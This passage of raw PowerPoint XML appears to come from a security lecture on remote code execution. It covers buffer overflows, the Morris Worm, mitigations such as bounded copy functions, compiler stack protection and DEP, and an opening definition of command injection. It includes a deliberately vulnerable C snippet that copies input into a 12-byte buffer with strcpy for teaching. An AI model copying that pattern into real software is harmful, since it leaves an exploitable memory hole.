          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322850" y="470325"/>
            <a:ext cx="75324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Remote Code Execution (RCE)?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1866" name="Google Shape;1866;p263"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1198725"/>
            <a:ext cx="7818174" cy="1663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dirty="0"/>
              <a:t>RCE is when an attacker is able to execute code on a remote machine</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>RCE is a consequence of larger vulnerability classes. </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Buffer overflows can lead to RCE</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>SQL Injection can lead to RCE</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Unsafe file uploads can lead to RCE</a:t>
            </a:r>
            <a:endParaRPr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Buffer Overflows</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1872" name="Google Shape;1872;p264"/>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900"/>
              <a:t>Buffer overflows are the most “popular” forms of code execution</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1900"/>
            </a:br>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-311150" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900"/>
              <a:t>Occurs when a program tries to write more data to a buffer in memory than it can hold, and the data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900" b="1" i="1"/>
              <a:t>overflows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900"/>
              <a:t>into adjacent memory</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-311150" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>The data can overflow into other local variables</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-311150" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>It can also overflow into the stack pointer, which points to the next instruction to execute</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-311150" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900"/>
              <a:t>Occurs most commonly in non-memory managed languages, such as C</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-311150" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>Because programmers have to manage memory themselves, mistakes are made when checking buffer lengths or freeing memory</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="54626A"/>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65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489400" y="1417975"/>
            <a:ext cx="4805700" cy="22233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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>	void copy(char* bar) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>		char c[12];</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>		strcpy(c, bar); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>		}	</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1878" name="Google Shape;1878;p265"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="75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Buffer Overflows</a:t>
            </a:r>
            <a:endParaRPr sz="28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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489400" y="1417975"/>
            <a:ext cx="4221748" cy="22233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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>	void copy(char* bar) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>		char c[12];</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>(c, bar);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>		}	</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1884" name="Google Shape;1884;p266"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="82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Buffer Overflows</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1885" name="Google Shape;1885;p266"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5894650" y="1723525"/>
            <a:ext cx="2474100" cy="16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rPr>
              <a:t>What happens if the user enters more than 12 characters?</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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1890" name="Google Shape;1890;p267"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="87850" y="685275"/>
            <a:ext cx="2960926" cy="4231376"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1891" name="Google Shape;1891;p267"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048775" y="685275"/>
            <a:ext cx="2960926" cy="4231376"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1892" name="Google Shape;1892;p267"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5878275" y="888112"/>
            <a:ext cx="3234975" cy="38257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68"/>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 World Examples</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1898" name="Google Shape;1898;p268"/>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p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>11/02/1988 - Morris Worm</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Exploited a buffer overflow in the fingerd service</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Used gets() with a 512-byte buffer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Today - Linux, Windows, Apache, nginx, MySQL, PostgreSQL, etc. all still have buffer overflows</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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2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Buffer Overflow Mitigation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1904" name="Google Shape;1904;p269"/>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Use safe methods</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>NO: gets(), scanf(), strcpy(), strcat()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>YES: fgets(), fscanf(), strcpy_s(), strcat_s()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>These methods accept a length parameter</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Compile binaries with hardening flags</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>GCC: -fstack-protector</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Visual Studio: /GS flag</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use Kernel/OS Protections</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Linux: grsecurity/PAX, Exec Shield </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OpenBSD: W^X</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Windows: Data Execution Prevention (DEP)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1905" name="Google Shape;1905;p269"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6536400" y="1010726"/>
            <a:ext cx="2372100" cy="35581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270"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404799" y="1198725"/>
            <a:ext cx="7751913" cy="16635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dirty="0"/>
              <a:t>Command injection occurs when an attacker can directly supply input to a shell</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" dirty="0"/>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>The root cause of command injection is similar to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>—data being used as code</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Untrusted input being concatenated to form queries and commands</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" dirty="0"/>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
